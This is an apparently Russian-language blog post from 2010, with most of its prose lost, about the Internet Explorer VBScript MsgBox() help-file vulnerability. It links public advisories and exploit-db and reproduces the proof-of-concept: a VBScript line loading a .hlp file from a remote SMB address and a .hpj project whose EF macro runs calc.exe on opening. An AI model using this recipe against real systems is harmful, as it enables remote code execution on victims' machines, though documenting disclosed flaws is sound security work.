-

 - e-mail

 

 -

   NeoliteBSD

 -

 LiveInternet.ru:
: 25.07.2007
: 39
: 25
: 106

:

(1)

VBScript MsgBox() Microsoft Windows. .

, 03 2010 . 10:06 +
IE VBScript. , : http://habrahabr.ru/blogs/infosecurity/86069/ http://focus.ua/tech/103699 , , , . - http://www.securitylab.ru/news/391250.php. !
Maurycy Prodeus PoC , VBScript MsgBox()
: http://www.securitylab.ru/vulnerability/391247.php, http://blogs.technet.com/msrc/archive/2010/02/28/i...d-internet-explorer-issue.aspx - , http://www.isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt - !
Proof-of-Concept is available here:

http://isec.pl/poc-isec27/
- winhlp32.exe , Calc.exe : big = "\\184.73.14.110\PUBLIC\test.hlp" =\ , http://www.exploit-db.com/exploits/11615 :
===============================================================
A copy of test.hlp can be downloaded from here:
http://www.exploit-db.com/sploits/msgbox_test_help.zip
===============================================================
, - ! ! ?.. : HelpScribble. .hlp . ! , , test.hlp. - test.rtf test.hpj. - , :
[OPTIONS]
LCID=0x409 0x0 0x0
COMPRESS=0

[CONFIG]
EF("C:\\WINDOWS\\calc.exe",`',1)

[FILES]
TEST.RTF

[MAP]
21KSYK4 1
- http://www.stcsig.org/oi/hyperviews/resources/winhelp_faq/whfaq_qa.htm
...

[3.1.8] Can I link to a URL (web site) from a help file? How?

There are a number of DLLs available for launching a web browser and displaying a web page. The DLLs are good when users don't have a default browser specified. If your users are relatively up to date, you can get away with a simple macro:

ExecFile(`http://www.mysite.net/default.html',,0,)

will usually do the trick. Both Netscape and Microsoft browsers will set up the files needed to launch a URL from the command line. The ExecFile macro just takes advantage of this capability. (Hint: From the Start menu, select Run, and then enter a URL. Click OK, and your browser should launch directly to the page you specified.)

...

- http://help.adobe.com/en_US/RoboHelp/Rword/7.0/mer...ELP_ExecFile_WinHelp_macro.htm

Help Workshop automatically converts the ExecFile macro to EF.

! =) .




:  

 : [1]